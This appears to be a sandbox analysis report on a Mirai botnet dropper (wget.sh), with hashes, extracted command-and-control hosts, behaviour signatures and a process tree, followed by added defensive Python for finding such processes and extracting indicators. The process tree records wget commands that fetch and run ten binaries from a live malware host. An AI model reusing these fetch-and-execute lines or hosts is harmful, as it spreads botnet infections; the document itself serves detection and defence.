Analysis
max time kernel: 133s
max time network: 145s
platform: debian-9_mips
resource: debian9-mipsbe-20240729-en
resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 18-12-2024 13:20
Static task: static1
Behavioral task behavioral1: sample wget.sh, resource ubuntu1804-amd64-20240508-en
Behavioral task behavioral2: sample wget.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample wget.sh, resource debian9-mipsbe-20240729-en (the run reported on this page; platform and resource above match it)
Behavioral task behavioral4: sample wget.sh, resource debian9-mipsel-20240611-en
General
Target: wget.sh
Size: 676B
MD5: 5b3ceaec7a3ad11b45f5fca1b603d939
SHA1: 5e5ee3fa232288f77e670c66d8ca42c0cc171e45
SHA256: bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
SHA512: 47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Extracted: mirai
  BOTNET: boats.dogmuncher.xyz, 89.190.156.145
Extracted: mirai
  BOTNET: 89.190.156.145, boats.dogmuncher.xyz
Extracted: mirai
  BOTNET: boats.dogmuncher.xyz, 89.190.156.145
Extracted: mirai
  89.190.156.1, 89.190.156.145 (as extracted; no BOTNET label on this entry)
Signatures
Mirai family
File and Directory Permissions Modification (1 TTP, 10 IoCs; ATT&CK T1222)
Adversaries may modify file or directory permissions to evade defenses.
  Process chmod, PIDs 734, 743, 751, 755, 761, 783, 797, 815, 828, 833
Deletes itself (1 IoC)
  Process kqibeps, PID 745 (the process tree below lists kqibeps as PID 744)
Executes dropped EXE (10 IoCs)
  /tmp/wkb86 (PID 735), /tmp/kqibeps (744), /tmp/bojwsl (752), /tmp/njvwa4 (756), /tmp/ngwa5 (762), /tmp/woega6 (785), /tmp/fnkea7 (799), /tmp/gnjqwpc (817), /tmp/wlw68k (830), /tmp/wrjkngh4 (834)
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name (1 IoC)
Changes the process name, possibly in an attempt to hide itself
  kqibeps (PID 744) presents itself as httpd
Reads runtime system information
  kqibeps opened /proc/<pid>/cmdline for reading for 56 PIDs: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 36, 37, 68, 69, 70, 71, 72, 73, 74, 75, 78, 81, 83, 110, 126, 127, 156, 160, 177, 234, 249, 332, 358, 360, 361, 362, 380, 383, 388, 425, 676, 679, 682 (i.e. every process on the box, consistent with a scan of running processes by command line)
Writes file to tmp directory (10 IoCs)
Malware often drops required files in the /tmp directory.
  wget opened for modification: /tmp/wlw68k, /tmp/wrjkngh4, /tmp/wkb86, /tmp/kqibeps, /tmp/njvwa4, /tmp/fnkea7, /tmp/bojwsl, /tmp/ngwa5, /tmp/woega6, /tmp/gnjqwpc
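Three of the signatures above (Executes dropped EXE, Deletes itself, Changes its process name) leave traces in procfs that a host-side check can catch without any sandbox: the binary runs from /tmp, its /proc/<pid>/exe link carries the kernel's " (deleted)" suffix once it has unlinked itself, and argv[0] ("httpd") no longer matches the executable name (kqibeps). The scanner below is an added example, not code from the report or from the sandbox vendor; it runs over a constructed fake /proc tree modelled on PIDs 735 and 744 from this report, plus one benign sshd entry, and the PIDs, paths and argv values in the fixture are assumptions for illustration.

```python
import os
import shutil
import tempfile

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED_SUFFIX = " (deleted)"  # appended by the kernel to /proc/<pid>/exe after unlink


def scan_proc(proc_root="/proc"):
    """Walk a /proc tree and flag processes that look like this sample's payloads:
    exe in a world-writable temp dir, exe unlinked while running, or argv[0]
    that does not match the executable's name."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
            with open(os.path.join(pid_dir, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue  # kernel thread, process already gone, or EACCES on another user's process
        argv = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
        deleted = exe.endswith(DELETED_SUFFIX)
        exe_path = exe[: -len(DELETED_SUFFIX)] if deleted else exe
        reasons = []
        if deleted:
            reasons.append("exe unlinked while running")
        if exe_path.startswith(TEMP_DIRS):
            reasons.append("exe in world-writable temp dir")
        if argv and os.path.basename(argv[0]) != os.path.basename(exe_path):
            reasons.append("argv[0] %r does not match exe %r" % (argv[0], exe_path))
        if reasons:
            findings.append({"pid": int(entry), "exe": exe_path, "argv": argv, "reasons": reasons})
    return sorted(findings, key=lambda f: f["pid"])


def build_fake_proc(root, processes):
    """Constructed fixture: lay out <root>/<pid>/{exe,cmdline} the way procfs does.
    processes is a list of (pid, exe link target, argv list)."""
    for pid, exe_target, argv in processes:
        pid_dir = os.path.join(root, str(pid))
        os.makedirs(pid_dir)
        os.symlink(exe_target, os.path.join(pid_dir, "exe"))  # a dangling link is fine; readlink returns the text
        with open(os.path.join(pid_dir, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")


def demo():
    """Run the scanner over a fake /proc modelled on this report (assumed values)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    try:
        build_fake_proc(root, [
            (400, "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),  # benign: no finding expected
            (735, "/tmp/wkb86", ["./wkb86", "telnet"]),          # dropped EXE, name intact
            (744, "/tmp/kqibeps (deleted)", ["httpd"]),          # renamed and self-deleted
        ])
        return scan_proc(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["pid"], finding["exe"], finding["argv"], "; ".join(finding["reasons"]))
```

On a live host run `scan_proc()` with the default root as root, since /proc/<pid>/exe of other users' processes is unreadable otherwise. The argv[0] check will also flag interpreters (argv[0] "python3" against exe "python3.11"), so pair it with /proc/<pid>/comm and an allow-list of interpreters before alerting on it alone; the temp-dir and "(deleted)" checks are the higher-confidence ones for this sample.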
Processes
Ten rounds of the same three steps under the dropper: wget fetches a file from http://stop.eye-network.ru/, chmod marks it executable, the file is executed from /tmp with the single argument telnet. The growing, alphabetically ordered chmod argument lists are consistent with a glob over /tmp (the systemd-private-...-timedated.service-wyfY5E entry is the sandbox's own tmp directory, not something the script created). kqibeps is absent from every chmod list after PID 744, which matches the Deletes itself signature.

[711] /tmp/wget.sh: /tmp/wget.sh
  [715] /usr/bin/wget: wget http://stop.eye-network.ru/wkb86  (Writes file to tmp directory)
  [734] /bin/chmod: chmod +x systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86  (File and Directory Permissions Modification)
  [735] /tmp/wkb86: ./wkb86 telnet  (Executes dropped EXE)
  [738] /usr/bin/wget: wget http://stop.eye-network.ru/kqibeps  (Writes file to tmp directory)
  [743] /bin/chmod: chmod +x kqibeps systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86  (File and Directory Permissions Modification)
  [744] /tmp/kqibeps: ./kqibeps telnet  (Deletes itself; Executes dropped EXE; Changes its process name; Reads runtime system information)
  [747] /usr/bin/wget: wget http://stop.eye-network.ru/bojwsl  (Writes file to tmp directory)
  [751] /bin/chmod: chmod +x bojwsl systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86  (File and Directory Permissions Modification)
  [752] /tmp/bojwsl: ./bojwsl telnet  (Executes dropped EXE)
  [754] /usr/bin/wget: wget http://stop.eye-network.ru/njvwa4  (Writes file to tmp directory)
  [755] /bin/chmod: chmod +x bojwsl njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86  (File and Directory Permissions Modification)
  [756] /tmp/njvwa4: ./njvwa4 telnet  (Executes dropped EXE)
  [758] /usr/bin/wget: wget http://stop.eye-network.ru/ngwa5  (Writes file to tmp directory)
  [761] /bin/chmod: chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86  (File and Directory Permissions Modification)
  [762] /tmp/ngwa5: ./ngwa5 telnet  (Executes dropped EXE)
  [765] /usr/bin/wget: wget http://stop.eye-network.ru/woega6  (Writes file to tmp directory)
  [783] /bin/chmod: chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6  (File and Directory Permissions Modification)
  [785] /tmp/woega6: ./woega6 telnet  (Executes dropped EXE)
  [787] /usr/bin/wget: wget http://stop.eye-network.ru/fnkea7  (Writes file to tmp directory)
  [797] /bin/chmod: chmod +x bojwsl fnkea7 ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6  (File and Directory Permissions Modification)
  [799] /tmp/fnkea7: ./fnkea7 telnet  (Executes dropped EXE)
  [801] /usr/bin/wget: wget http://stop.eye-network.ru/gnjqwpc  (Writes file to tmp directory)
  [815] /bin/chmod: chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6  (File and Directory Permissions Modification)
  [817] /tmp/gnjqwpc: ./gnjqwpc telnet  (Executes dropped EXE)
  [821] /usr/bin/wget: wget http://stop.eye-network.ru/wlw68k  (Writes file to tmp directory)
  [828] /bin/chmod: chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6  (File and Directory Permissions Modification)
  [830] /tmp/wlw68k: ./wlw68k telnet  (Executes dropped EXE)
  [832] /usr/bin/wget: wget http://stop.eye-network.ru/wrjkngh4  (Writes file to tmp directory)
  [833] /bin/chmod: chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6 wrjkngh4  (File and Directory Permissions Modification)
  [834] /tmp/wrjkngh4: ./wrjkngh4 telnet  (Executes dropped EXE)
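The process tree is where the actionable indicators live: the download host, the ten URLs, the dropped paths, and the fact that every binary is launched with the argument telnet. The script below is an added example, not part of the report, that pairs each downloader invocation with the later chmod and execution of the same file name and flattens the result into indicators; it runs over a constructed fixture containing the first two rounds from the tree above (PIDs 711 to 744), with the exe/argv split that the page fuses onto one line, and it is not tied to any sandbox vendor's export format.

```python
import os
import re
from urllib.parse import urlparse

# Constructed fixture: (pid, exe, cmdline) for the first two download rounds
# from this report's process tree. Remaining rounds follow the same shape.
SAMPLE_PROCESSES = [
    (711, "/tmp/wget.sh", "/tmp/wget.sh"),
    (715, "/usr/bin/wget", "wget http://stop.eye-network.ru/wkb86"),
    (734, "/bin/chmod", "chmod +x systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86"),
    (735, "/tmp/wkb86", "./wkb86 telnet"),
    (738, "/usr/bin/wget", "wget http://stop.eye-network.ru/kqibeps"),
    (743, "/bin/chmod", "chmod +x kqibeps systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86"),
    (744, "/tmp/kqibeps", "./kqibeps telnet"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl"}


def _grants_exec(argv):
    """True for `chmod +x ...`, `chmod a+x ...` or a numeric mode such as 777."""
    mode = argv[1] if len(argv) > 1 else ""
    return "x" in mode or mode.isdigit()


def find_drop_chains(processes):
    """Pair every downloader invocation with the later chmod and execution of
    the file it fetched. Stages that never happened stay None, so an analyst
    sees where a chain stopped (a build for the wrong CPU will download and
    chmod but never show an exec entry)."""
    chains = []
    for i, (pid, exe, cmdline) in enumerate(processes):
        if os.path.basename(exe) not in DOWNLOADERS:
            continue
        match = URL_RE.search(cmdline)
        if not match:
            continue
        url = match.group(0)
        name = os.path.basename(urlparse(url).path)
        chain = {"url": url, "name": name, "download_pid": pid,
                 "chmod_pid": None, "exec_pid": None, "exec_exe": None, "exec_args": None}
        for later_pid, later_exe, later_cmd in processes[i + 1:]:
            argv = later_cmd.split()
            base = os.path.basename(later_exe)
            if base == "chmod" and chain["chmod_pid"] is None and _grants_exec(argv) and name in argv:
                chain["chmod_pid"] = later_pid
            elif base == name and chain["exec_pid"] is None:
                chain["exec_pid"] = later_pid
                chain["exec_exe"] = later_exe
                chain["exec_args"] = argv[1:]
            if chain["chmod_pid"] is not None and chain["exec_pid"] is not None:
                break
        chains.append(chain)
    return chains


def summarize_iocs(chains):
    """Flatten chains into the indicators you would block, hunt for, or hash."""
    return {
        "hosts": sorted({urlparse(c["url"]).hostname for c in chains}),
        "urls": [c["url"] for c in chains],
        "dropped_paths": [c["exec_exe"] for c in chains if c["exec_exe"]],
        "exec_args": sorted({" ".join(c["exec_args"]) for c in chains if c["exec_args"]}),
        "complete_chains": sum(1 for c in chains if c["chmod_pid"] and c["exec_pid"]),
    }


if __name__ == "__main__":
    chains = find_drop_chains(SAMPLE_PROCESSES)
    for chain in chains:
        print(chain)
    print(summarize_iocs(chains))
```

The pairing is by file name rather than by parent PID on purpose: in this tree every step is a direct child of the shell (depth 2), so parent/child links say nothing about which chmod belongs to which download, while the name carried from URL to chmod argument to exe path does.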
Network
MITRE ATT&CK Enterprise v15
Downloads
Ten files, one per wget fetch in the process tree; the page does not state which hash belongs to which dropped file name.
- Filesize 209KB
  MD5 901565495bd736c186e19bcf63f9d6d0
  SHA1 0156d815e43459f529a8e1cb131f33b35c2bc389
  SHA256 19e20910c5b4daf752d3f07df71bf95312b857ad5f4ee00c1f6a383c3413e099
  SHA512 e148d65c398fb792449734ef9da6813dfa4062f24f4e1ff504094012684fa094012021ab613946e169062c107d6605d191a161925f1583fc8673ed61b6fef77c
- Filesize 211KB
  MD5 cc46ad336ea582beb1e6bf06871efccb
  SHA1 bf95a69fa2704c2cadd2de7fedd6b573489f8a3e
  SHA256 db7fedf7dc012292b4490f3c526c2f3f8dbbc5542da74551f8f0ec15bab3a01d
  SHA512 1206b0e0c79ad1d0e7a77b9a16b1afded0e19198fd3df094524b0688fa7a168511fc055d58d4f7957fc1c035ef2d1fa4251ce74146b04b1fb4fcdcaeba2c5cb1
- Filesize 158KB
  MD5 65679cbca61800b0d5e8824408b318c4
  SHA1 4c5fca0a6ac37a24463c9b5fa1319c8f80e3f1f5
  SHA256 e6e10d2701e51f85f413e188b8139554704536e6e40f462b6cca0693e9cf0eff
  SHA512 0acd6c8c7a7ecbe6a0e122c3f988d1d4938c765027234e5d8370676b078c871644b8ddb3db6e12016da4806ff93b748c6b7dd1a0e15366ba14b978edf90ad94c
- Filesize 206KB
  MD5 c2728c3969fbcb7e59700b7f6bb997db
  SHA1 af85cd16b5a1f2623a738b4fb0b422512c504ff4
  SHA256 e78b085f11226c1acaba5efe9d2d5b60dab6d4043cb49d1a27dd332166a5e70d
  SHA512 2c68775f9d5da1e1e678fecab7c28558e2c1aaaa2436ca2d6d176fc50c832be232027b7fa8fa490a822cbe630bb724263ac1f764ff0b57345926f9954dacf5f3
- Filesize 154KB
  MD5 f54eef0f2a2b3d1b95d027e2f9fc075b
  SHA1 9808f95f07348a1e62b9986ed35ff332f60010b6
  SHA256 6f062123d1fa8fb843406f71d2bf782017dad159aea3e23fc98543923c0c2bad
  SHA512 d382986c74a44bd247f3c51d45a1fee5d13746500662e5dbca6d30cd113f89deb1c391b4855e233b645c1690a8d10b09acde0e4b63580b1c8c695be8bdaffa8e
- Filesize 158KB
  MD5 3d9f94b86edde676d3241c1707c965cb
  SHA1 b7121399cf77d48c48b2a256b8df1f3579603239
  SHA256 05ce105f8c50cc8ad232fb7e55d253713a438b08c38735bfea18f04fda288924
  SHA512 021558a83495e651baca0e7874f78886b3dc3e3d20e505f7ec826effad8b21ebdb29a5343bbdb01170eefa32277fbeda801b29f8bf30d6812b4abeea652bc61b
- Filesize 113KB
  MD5 5f33f958945dce126f4f18ee23b09162
  SHA1 11bb26bd016673b201bf56c61087e6727736a971
  SHA256 ae156529ee59ea9218d3bbb7760d536e8becff7ff55659f9b723fcdfb1fa7726
  SHA512 e96b2b90261b4d7eeb16f9698c83a920a43853cd5d7cff7aae8d2a03fd5e88f7a344437740e6efe22cf789cd9ca29e05328673f49527643a2c13dc0ceb250ef3
- Filesize 175KB
  MD5 fc93b0974c9c1fd3179c2bc5714bb203
  SHA1 aea0232bb853b329ce85fc04552bcfb67cb897fa
  SHA256 6f83e2edcb9d60d48a3a005edc0b34daea54de05e13cd72d841a7f36a34780c8
  SHA512 998f8f5521fe9e7b3394f51bc589304c02447952ed28a6f75dfb8ab328957f7466fd84cc4c482b764d1e80dc454e1bb4eaf0cd5588d323d99c97f034cc7832fd
- Filesize 166KB
  MD5 b62613f0cd94e7252a6ec8f452b2ee14
  SHA1 a72e04a7230ee9d505b29386640e8d442d5ee209
  SHA256 67c705c47fdbb971ad5500dc566409584187c846dc3336c70cd000b07b77a3cf
  SHA512 760f5f3560215153695f3ca39c836b0b7f18c552f6eb93bf9063b22ead6fefa39f1d1995af5ae0bd5f8bd0d5bbb82d1b639d1512ff64c57ae96dd81d51ae39ba
- Filesize 142KB
  MD5 6c93d778ab9bbcf70e0cd1f6966be42f
  SHA1 85f235c84a56d4bac89f0b94db1786b374ef0d40
  SHA256 4e92d2333051f2abd221547d29643d6d7c23b5a30fd84177ebd2b39544338e6f
  SHA512 b79bc19f4f4a2c5a3f4f286ef73edb198aef8110b52f39146dc850f25a41cf06d33a743a9035945c92dd0a78d91e742c21962c10191f14869a6ee22840ae5549